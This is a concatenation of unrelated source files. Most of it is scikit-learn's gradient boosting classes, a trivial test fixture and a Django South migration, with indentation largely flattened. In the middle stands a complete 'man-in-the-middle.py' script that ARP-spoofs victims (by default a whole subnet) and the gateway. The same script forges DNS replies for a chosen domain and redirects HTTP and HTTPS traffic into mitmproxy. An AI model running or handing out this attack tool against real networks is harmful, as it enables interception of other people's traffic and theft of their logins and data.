iteration, a reference to the estimator and the local variables of
``_fit_stages`` as keyword arguments ``callable(i, self,
locals())``. If the callable returns ``True`` the fitting procedure
is stopped. The monitor can be used for various things such as
            computing held-out estimates, early stopping, model introspection, and
            snapshotting.
Returns
-------
self : object
Returns self.
"""
# if not warmstart - clear the estimator state
if not self.warm_start:
self._clear_state()
# Check input
X, y = check_X_y(X, y, dtype=DTYPE)
n_samples, self.n_features = X.shape
if sample_weight is None:
sample_weight = np.ones(n_samples, dtype=np.float32)
else:
sample_weight = column_or_1d(sample_weight, warn=True)
check_consistent_length(X, y, sample_weight)
y = self._validate_y(y)
random_state = check_random_state(self.random_state)
self._check_params()
if not self._is_initialized():
# init state
self._init_state()
# fit initial model - FIXME make sample_weight optional
self.init_.fit(X, y, sample_weight)
# init predictions
y_pred = self.init_.predict(X)
begin_at_stage = 0
else:
# add more estimators to fitted model
# invariant: warm_start = True
if self.n_estimators < self.estimators_.shape[0]:
raise ValueError('n_estimators=%d must be larger or equal to '
'estimators_.shape[0]=%d when '
'warm_start==True'
% (self.n_estimators,
self.estimators_.shape[0]))
begin_at_stage = self.estimators_.shape[0]
y_pred = self._decision_function(X)
self._resize_state()
# fit the boosting stages
n_stages = self._fit_stages(X, y, y_pred, sample_weight, random_state,
begin_at_stage, monitor)
# change shape of arrays after fit (early-stopping or additional ests)
if n_stages != self.estimators_.shape[0]:
self.estimators_ = self.estimators_[:n_stages]
self.train_score_ = self.train_score_[:n_stages]
if hasattr(self, 'oob_improvement_'):
self.oob_improvement_ = self.oob_improvement_[:n_stages]
return self
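    # Illustrative sketch (not part of scikit-learn): the ``monitor`` callable
    # documented in ``fit`` above could, for instance, stop boosting once the
    # out-of-bag improvement turns negative (this assumes ``subsample < 1`` so
    # that ``oob_improvement_`` is populated):
    #
    #   def oob_monitor(i, est, locals_):
    #       return i > 10 and est.oob_improvement_[i] < 0
    #
    #   clf.fit(X, y, monitor=oob_monitor)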
def _fit_stages(self, X, y, y_pred, sample_weight, random_state,
begin_at_stage=0, monitor=None):
"""Iteratively fits the stages.
For each stage it computes the progress (OOB, train score)
and delegates to ``_fit_stage``.
Returns the number of stages fit; might differ from ``n_estimators``
due to early stopping.
"""
n_samples = X.shape[0]
do_oob = self.subsample < 1.0
sample_mask = np.ones((n_samples, ), dtype=np.bool)
n_inbag = max(1, int(self.subsample * n_samples))
loss_ = self.loss_
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
# init criterion and splitter
criterion = FriedmanMSE(1)
splitter = PresortBestSplitter(criterion,
self.max_features_,
self.min_samples_leaf,
min_weight_leaf,
random_state)
if self.verbose:
verbose_reporter = VerboseReporter(self.verbose)
verbose_reporter.init(self, begin_at_stage)
# perform boosting iterations
i = begin_at_stage
for i in range(begin_at_stage, self.n_estimators):
# subsampling
if do_oob:
sample_mask = _random_sample_mask(n_samples, n_inbag,
random_state)
# OOB score before adding this stage
old_oob_score = loss_(y[~sample_mask],
y_pred[~sample_mask],
sample_weight[~sample_mask])
# fit next stage of trees
y_pred = self._fit_stage(i, X, y, y_pred, sample_weight,
sample_mask, criterion, splitter,
random_state)
# track deviance (= loss)
if do_oob:
self.train_score_[i] = loss_(y[sample_mask],
y_pred[sample_mask],
sample_weight[sample_mask])
self.oob_improvement_[i] = (
old_oob_score - loss_(y[~sample_mask],
y_pred[~sample_mask],
sample_weight[~sample_mask]))
else:
# no need to fancy index w/ no subsampling
self.train_score_[i] = loss_(y, y_pred, sample_weight)
if self.verbose > 0:
verbose_reporter.update(i, self)
if monitor is not None:
early_stopping = monitor(i, self, locals())
if early_stopping:
break
return i + 1
def _make_estimator(self, append=True):
# we don't need _make_estimator
raise NotImplementedError()
def _init_decision_function(self, X):
"""Check input and compute prediction of ``init``. """
if self.estimators_ is None or len(self.estimators_) == 0:
            raise NotFittedError("Estimator not fitted, call `fit`"
                                 " before making predictions.")
if X.shape[1] != self.n_features:
raise ValueError("X.shape[1] should be {0:d}, not {1:d}.".format(
self.n_features, X.shape[1]))
score = self.init_.predict(X).astype(np.float64)
return score
def _decision_function(self, X):
# for use in inner loop, not raveling the output in single-class case,
# not doing input validation.
score = self._init_decision_function(X)
predict_stages(self.estimators_, X, self.learning_rate, score)
return score
@deprecated(" and will be removed in 0.19")
def decision_function(self, X):
"""Compute the decision function of ``X``.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : array, shape = [n_samples, n_classes] or [n_samples]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification produce an array of shape
[n_samples].
"""
X = check_array(X, dtype=DTYPE, order="C")
score = self._decision_function(X)
if score.shape[1] == 1:
return score.ravel()
return score
def _staged_decision_function(self, X):
"""Compute decision function of ``X`` for each iteration.
        This method allows monitoring (i.e. determining the error on a test set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification are special cases with
``k == 1``, otherwise ``k==n_classes``.
"""
X = check_array(X, dtype=DTYPE, order="C")
score = self._init_decision_function(X)
for i in range(self.estimators_.shape[0]):
predict_stage(self.estimators_, i, X, self.learning_rate, score)
yield score.copy()
@deprecated(" and will be removed in 0.19")
def staged_decision_function(self, X):
"""Compute decision function of ``X`` for each iteration.
        This method allows monitoring (i.e. determining the error on a test set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification are special cases with
``k == 1``, otherwise ``k==n_classes``.
"""
for dec in self._staged_decision_function(X):
# no yield from in Python2.X
yield dec
@property
def feature_importances_(self):
"""Return the feature importances (the higher, the more important the
feature).
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.estimators_ is None or len(self.estimators_) == 0:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
total_sum = np.zeros((self.n_features, ), dtype=np.float64)
for stage in self.estimators_:
stage_sum = sum(tree.feature_importances_
for tree in stage) / len(stage)
total_sum += stage_sum
importances = total_sum / len(self.estimators_)
return importances
def _validate_y(self, y):
self.n_classes_ = 1
if y.dtype.kind == 'O':
y = y.astype(np.float64)
# Default implementation
return y
class GradientBoostingClassifier(BaseGradientBoosting, ClassifierMixin):
"""Gradient Boosting for classification.
GB builds an additive model in a
forward stage-wise fashion; it allows for the optimization of
arbitrary differentiable loss functions. In each stage ``n_classes_``
regression trees are fit on the negative gradient of the
binomial or multinomial deviance loss function. Binary classification
is a special case where only a single regression tree is induced.
Parameters
----------
loss : {'deviance', 'exponential'}, optional (default='deviance')
loss function to be optimized. 'deviance' refers to
deviance (= logistic regression) for classification
with probabilistic outputs. For loss 'exponential' gradient
boosting recovers the AdaBoost algorithm.
learning_rate : float, optional (default=0.1)
learning rate shrinks the contribution of each tree by `learning_rate`.
There is a trade-off between learning_rate and n_estimators.
n_estimators : int (default=100)
The number of boosting stages to perform. Gradient boosting
is fairly robust to over-fitting so a large number usually
results in better performance.
max_depth : integer, optional (default=3)
maximum depth of the individual regression estimators. The maximum
depth limits the number of nodes in the tree. Tune this parameter
for best performance; the best value depends on the interaction
of the input variables.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
subsample : float, optional (default=1.0)
The fraction of samples to be used for fitting the individual base
learners. If smaller than 1.0 this results in Stochastic Gradient
Boosting. `subsample` interacts with the parameter `n_estimators`.
Choosing `subsample < 1.0` leads to a reduction of variance
and an increase in bias.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Choosing `max_features < n_features` leads to a reduction of variance
and an increase in bias.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
init : BaseEstimator, None, optional (default=None)
An estimator object that is used to compute the initial
predictions. ``init`` has to provide ``fit`` and ``predict``.
If None it uses ``loss.init_estimator``.
verbose : int, default: 0
Enable verbose output. If 1 then it prints progress and performance
once in a while (the more trees the lower the frequency). If greater
than 1 then it prints progress and performance for every tree.
warm_start : bool, default: False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just erase the
previous solution.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
feature_importances_ : array, shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_improvement_ : array, shape = [n_estimators]
The improvement in loss (= deviance) on the out-of-bag samples
relative to the previous iteration.
``oob_improvement_[0]`` is the improvement in
loss of the first stage over the ``init`` estimator.
train_score_ : array, shape = [n_estimators]
The i-th score ``train_score_[i]`` is the deviance (= loss) of the
model at iteration ``i`` on the in-bag sample.
If ``subsample == 1`` this is the deviance on the training data.
loss_ : LossFunction
The concrete ``LossFunction`` object.
init : BaseEstimator
The estimator that provides the initial predictions.
Set via the ``init`` argument or ``loss.init_estimator``.
estimators_ : ndarray of DecisionTreeRegressor, shape = [n_estimators, loss_.K]
The collection of fitted sub-estimators. ``loss_.K`` is 1 for binary
classification, otherwise n_classes.
See also
--------
sklearn.tree.DecisionTreeClassifier, RandomForestClassifier
AdaBoostClassifier
References
----------
J. Friedman, Greedy Function Approximation: A Gradient Boosting
Machine, The Annals of Statistics, Vol. 29, No. 5, 2001.
J. Friedman, Stochastic Gradient Boosting, 1999
T. Hastie, R. Tibshirani and J. Friedman.
Elements of Statistical Learning Ed. 2, Springer, 2009.
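    Examples
    --------
    A minimal usage sketch on synthetic data (illustrative values only; the
    data and parameter choices below are placeholders)::
        import numpy as np
        from sklearn.ensemble import GradientBoostingClassifier
        rng = np.random.RandomState(0)
        X = rng.rand(100, 4)
        y = (X[:, 0] + X[:, 1] > 1.0).astype(int)
        clf = GradientBoostingClassifier(n_estimators=50, random_state=0)
        clf.fit(X, y)
        proba = clf.predict_proba(X)  # array of shape (100, 2)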
"""
_SUPPORTED_LOSS = ('deviance', 'exponential')
def __init__(self, loss='deviance', learning_rate=0.1, n_estimators=100,
subsample=1.0, min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, init=None, random_state=None,
max_features=None, verbose=0,
max_leaf_nodes=None, warm_start=False):
super(GradientBoostingClassifier, self).__init__(
loss=loss, learning_rate=learning_rate, n_estimators=n_estimators,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_depth=max_depth, init=init, subsample=subsample,
max_features=max_features,
random_state=random_state, verbose=verbose,
max_leaf_nodes=max_leaf_nodes, warm_start=warm_start)
def _validate_y(self, y):
self.classes_, y = np.unique(y, return_inverse=True)
self.n_classes_ = len(self.classes_)
return y
def decision_function(self, X):
"""Compute the decision function of ``X``.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : array, shape = [n_samples, n_classes] or [n_samples]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification produce an array of shape
[n_samples].
"""
X = check_array(X, dtype=DTYPE, order="C")
score = self._decision_function(X)
if score.shape[1] == 1:
return score.ravel()
return score
def staged_decision_function(self, X):
"""Compute decision function of ``X`` for each iteration.
        This method allows monitoring (i.e. determining the error on a test set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification are special cases with
``k == 1``, otherwise ``k==n_classes``.
"""
for dec in self._staged_decision_function(X):
# no yield from in Python2.X
yield dec
def predict(self, X):
"""Predict class for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
        y : array of shape = [n_samples]
The predicted values.
"""
score = self.decision_function(X)
decisions = self.loss_._score_to_decision(score)
return self.classes_.take(decisions, axis=0)
def staged_predict(self, X):
"""Predict class at each stage for X.
        This method allows monitoring (i.e. determining the error on a test set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array of shape = [n_samples]
The predicted value of the input samples.
"""
for score in self._staged_decision_function(X):
decisions = self.loss_._score_to_decision(score)
yield self.classes_.take(decisions, axis=0)
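    # Illustrative use of ``staged_predict`` (sketch; ``clf``, ``X_test`` and
    # ``y_test`` are placeholder names for a fitted classifier and held-out data):
    #
    #     stage_errors = [np.mean(y_stage != y_test)
    #                     for y_stage in clf.staged_predict(X_test)]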
def predict_proba(self, X):
"""Predict class probabilities for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Raises
------
AttributeError
If the ``loss`` does not support probabilities.
Returns
-------
        p : array of shape = [n_samples, n_classes]
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
score = self.decision_function(X)
try:
return self.loss_._score_to_proba(score)
except NotFittedError:
raise
except AttributeError:
raise AttributeError('loss=%r does not support predict_proba' %
self.loss)
def predict_log_proba(self, X):
"""Predict class log-probabilities for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Raises
------
AttributeError
If the ``loss`` does not support probabilities.
Returns
-------
        p : array of shape = [n_samples, n_classes]
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
return np.log(proba)
def staged_predict_proba(self, X):
"""Predict class probabilities at each stage for X.
        This method allows monitoring (i.e. determining the error on a test set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array of shape = [n_samples]
The predicted value of the input samples.
"""
try:
for score in self._staged_decision_function(X):
yield self.loss_._score_to_proba(score)
except NotFittedError:
raise
except AttributeError:
raise AttributeError('loss=%r does not support predict_proba' %
self.loss)
class GradientBoostingRegressor(BaseGradientBoosting, RegressorMixin):
"""Gradient Boosting for regression.
GB builds an additive model in a forward stage-wise fashion;
it allows for the optimization of arbitrary differentiable loss functions.
In each stage a regression tree is fit on the negative gradient of the
given loss function.
Parameters
----------
loss : {'ls', 'lad', 'huber', 'quantile'}, optional (default='ls')
loss function to be optimized. 'ls' refers to least squares
regression. 'lad' (least absolute deviation) is a highly robust
loss function solely based on order information of the input
variables. 'huber' is a combination of the two. 'quantile'
allows quantile regression (use `alpha` to specify the quantile).
learning_rate : float, optional (default=0.1)
learning rate shrinks the contribution of each tree by `learning_rate`.
There is a trade-off between learning_rate and n_estimators.
n_estimators : int (default=100)
The number of boosting stages to perform. Gradient boosting
is fairly robust to over-fitting so a large number usually
results in better performance.
max_depth : integer, optional (default=3)
maximum depth of the individual regression estimators. The maximum
depth limits the number of nodes in the tree. Tune this parameter
for best performance; the best value depends on the interaction
of the input variables.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
subsample : float, optional (default=1.0)
The fraction of samples to be used for fitting the individual base
learners. If smaller than 1.0 this results in Stochastic Gradient
Boosting. `subsample` interacts with the parameter `n_estimators`.
Choosing `subsample < 1.0` leads to a reduction of variance
and an increase in bias.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Choosing `max_features < n_features` leads to a reduction of variance
and an increase in bias.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
alpha : float (default=0.9)
The alpha-quantile of the huber loss function and the quantile
loss function. Only if ``loss='huber'`` or ``loss='quantile'``.
init : BaseEstimator, None, optional (default=None)
An estimator object that is used to compute the initial
predictions. ``init`` has to provide ``fit`` and ``predict``.
If None it uses ``loss.init_estimator``.
verbose : int, default: 0
Enable verbose output. If 1 then it prints progress and performance
once in a while (the more trees the lower the frequency). If greater
than 1 then it prints progress and performance for every tree.
warm_start : bool, default: False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just erase the
previous solution.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
feature_importances_ : array, shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_improvement_ : array, shape = [n_estimators]
The improvement in loss (= deviance) on the out-of-bag samples
relative to the previous iteration.
``oob_improvement_[0]`` is the improvement in
loss of the first stage over the ``init`` estimator.
train_score_ : array, shape = [n_estimators]
The i-th score ``train_score_[i]`` is the deviance (= loss) of the
model at iteration ``i`` on the in-bag sample.
If ``subsample == 1`` this is the deviance on the training data.
loss_ : LossFunction
The concrete ``LossFunction`` object.
`init` : BaseEstimator
The estimator that provides the initial predictions.
Set via the ``init`` argument or ``loss.init_estimator``.
estimators_ : ndarray of DecisionTreeRegressor, shape = [n_estimators, 1]
The collection of fitted sub-estimators.
See also
--------
DecisionTreeRegressor, RandomForestRegressor
References
----------
J. Friedman, Greedy Function Approximation: A Gradient Boosting
Machine, The Annals of Statistics, Vol. 29, No. 5, 2001.
J. Friedman, Stochastic Gradient Boosting, 1999
T. Hastie, R. Tibshirani and J. Friedman.
Elements of Statistical Learning Ed. 2, Springer, 2009.
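    Examples
    --------
    A minimal usage sketch on synthetic data (illustrative values only; the
    data and parameter choices below are placeholders)::
        import numpy as np
        from sklearn.ensemble import GradientBoostingRegressor
        rng = np.random.RandomState(0)
        X = rng.rand(100, 4)
        y = 2.0 * X[:, 0] + rng.normal(scale=0.1, size=100)
        est = GradientBoostingRegressor(n_estimators=50, loss='ls', random_state=0)
        est.fit(X, y)
        y_pred = est.predict(X)  # array of shape (100,)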
"""
_SUPPORTED_LOSS = ('ls', 'lad', 'huber', 'quantile')
def __init__(self, loss='ls', learning_rate=0.1, n_estimators=100,
subsample=1.0, min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, init=None, random_state=None,
max_features=None, alpha=0.9, verbose=0, max_leaf_nodes=None,
warm_start=False):
super(GradientBoostingRegressor, self).__init__(
loss=loss, learning_rate=learning_rate, n_estimators=n_estimators,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_depth=max_depth, init=init, subsample=subsample,
max_features=max_features,
random_state=random_state, alpha=alpha, verbose=verbose,
max_leaf_nodes=max_leaf_nodes, warm_start=warm_start)
def predict(self, X):
"""Predict regression target for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : array of shape = [n_samples]
The predicted values.
"""
X = check_array(X, dtype=DTYPE, order="C")
return self._decision_function(X).ravel()
def staged_predict(self, X):
"""Predict regression target at each stage for X.
        This method allows monitoring (i.e. determining the error on a test set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array of shape = [n_samples]
The predicted value of the input samples.
"""
for y in self._staged_decision_function(X):
yield y.ravel()
|
idea4bsd/idea4bsd | refs/heads/idea4bsd-master | python/testData/copyPaste/multiLine/IndentInnerFunction2.dst.py | 83 | def foo(self):
x = 1
y = 2
<caret>
z = 3 |
mehdilauters/man-in-the-middle | refs/heads/master | man-in-the-middle.py | 1 | #!/usr/bin/env python
#
# Execute with sudo python man-in-the-middle.py
#
#
import time
import argparse
import signal
import nfqueue
import threading
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
exit = False
threads = []
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--victimIP", help="Choose the victim IP address. Example: -v 192.168.0.5")
parser.add_argument("-g", "--gateway", help="Choose the router IP address. Example: -r 192.168.0.1")
parser.add_argument("-i", "--interface", help="Choose the network interface. Example: -i eth0")
parser.add_argument("-d", "--dns", help="dns spoofing. Example: -d hackaday.com")
parser.add_argument("-w", "--web", action='store_true', help="80 web proxy")
parser.add_argument("-s", "--ssl", action='store_true', help="443 web proxy")
parser.add_argument("-p", "--proxy", action='store_true', help="start proxy")
parser.add_argument("-c", "--clean", action='store_true', help="clean all stuff")
return parser.parse_args()
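# Illustrative invocation (sketch; the interface and addresses are placeholders):
#   sudo python man-in-the-middle.py -i eth0 -v 192.168.0.5 -g 192.168.0.1 -d example.com -w -p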
def get_gw(interface):
for nw, nm, gw, iface, addr in read_routes():
if iface == interface and gw != "0.0.0.0":
return gw
def spoof(localMac,victims,gateway):
arps = []
op = 2
for victim in victims:
#spoof victim
arp = ARP(op=op,psrc=victim,pdst=gateway,hwdst=localMac)
arps.append(arp)
#spoof gw
arp = ARP(op=op,psrc=gateway,pdst=victim,hwdst=localMac)
arps.append(arp)
def run():
j = 0
while not exit:
for arp in arps:
j+=1
if exit:
break
send(arp,verbose=False)
time.sleep(1)
t1 = threading.Thread(target=run)
threads.append(t1)
#t1.join()
queues = []
def clean():
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('0\n')
print "[x] clean iptable"
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
os.system('iptables -F')
os.system('iptables -X')
def signal_handler(signal, frame):
    global exit
    exit = True
clean()
for queue in queues:
queue.unbind(socket.AF_INET)
queue.close()
    sys.exit("closing...")
def dns_setup(dns, localIp):
def dns_callback(i, payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
            if dns in pkt[DNS].qd.qname:
print "%s %s => %s"%(hex(pkt[DNS].id), pkt[IP].src, pkt[IP].dst)
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIp))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
print '[+] Sent spoofed packet for %s' % dns
os.system('iptables -A FORWARD -p udp --dport 53 -j NFQUEUE --queue-num 100')
queue = nfqueue.queue()
queue.open()
queue.bind(socket.AF_INET)
queue.set_callback(dns_callback)
queue.create_queue(100)
def run():
queue.try_run()
print "Dns spoof stopped"
p = Process(target=run)
threads.append(p)
def main(args):
if os.geteuid() != 0:
sys.exit("[!] Please run as root")
clean()
if args.clean:
return
interface = "eth0"
if args.interface is not None:
interface = args.interface
localMac = get_if_hwaddr(interface)
localIp = get_if_addr(interface)
if args.gateway is not None:
gateway = args.gateway
else:
gateway = get_gw(interface)
victims = []
if args.victimIP is None:
for i in range(0,255):
base = localIp.split(".")[:3]
base.append(str(i))
ip = '.'.join(base)
victims.append(ip)
else:
victims.append(args.victimIP)
if gateway is None:
print "Gateway issue"
return
signal.signal(signal.SIGUSR1, signal_handler)
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('1\n')
if args.dns is not None:
dns_setup(args.dns, localIp)
need_proxy = False
if args.web:
need_proxy = True
os.system('iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 8080'%interface)
if args.ssl:
need_proxy = True
os.system('iptables -t nat -A PREROUTING -i %s -p tcp --dport 443 -j REDIRECT --to-port 8080'%interface)
if args.proxy:
if need_proxy:
def run():
os.system("mitmproxy -T --host --anticache --stream 10m")
print "proxy stopped"
p = Process(target=run)
threads.append(p)
else:
print "Proxy started but not needed"
else:
if need_proxy:
print "you will need to start your proxy manually"
spoof(localMac, victims, gateway)
try:
for t in threads:
t.start()
for t in threads:
t.join()
except KeyboardInterrupt:
print "stop"
clean()
main(parse_args()) |
haystack/eyebrowse-server | refs/heads/master | notifications/migrations/0003_auto__del_field_notification_user__add_field_notification_recipient__a.py | 1 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Notification.user'
db.delete_column('notifications_notification', 'user_id')
# Adding field 'Notification.recipient'
db.add_column('notifications_notification', 'recipient',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name=u'notification_recipient', to=orm['auth.User']),
keep_default=False)
# Adding field 'Notification.sender'
db.add_column('notifications_notification', 'sender',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name=u'notification_sender', to=orm['auth.User']),
keep_default=False)
# Adding field 'Notification.date_created'
db.add_column('notifications_notification', 'date_created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2015, 3, 22, 0, 0)),
keep_default=False)
# Adding field 'Notification.url'
db.add_column('notifications_notification', 'url',
self.gf('django.db.models.fields.URLField')(max_length=300, null=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Notification.user'
db.add_column('notifications_notification', 'user',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['auth.User']),
keep_default=False)
# Deleting field 'Notification.recipient'
db.delete_column('notifications_notification', 'recipient_id')
# Deleting field 'Notification.sender'
db.delete_column('notifications_notification', 'sender_id')
# Deleting field 'Notification.date_created'
db.delete_column('notifications_notification', 'date_created')
# Deleting field 'Notification.url'
db.delete_column('notifications_notification', 'url')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'notifications.noticequeuebatch': {
'Meta': {'object_name': 'NoticeQueueBatch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pickled_data': ('django.db.models.fields.TextField', [], {})
},
'notifications.noticesetting': {
'Meta': {'unique_together': "((u'user', u'notice_type', u'medium', u'scoping_content_type', u'scoping_object_id'),)", 'object_name': 'NoticeSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medium': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notifications.NoticeType']"}),
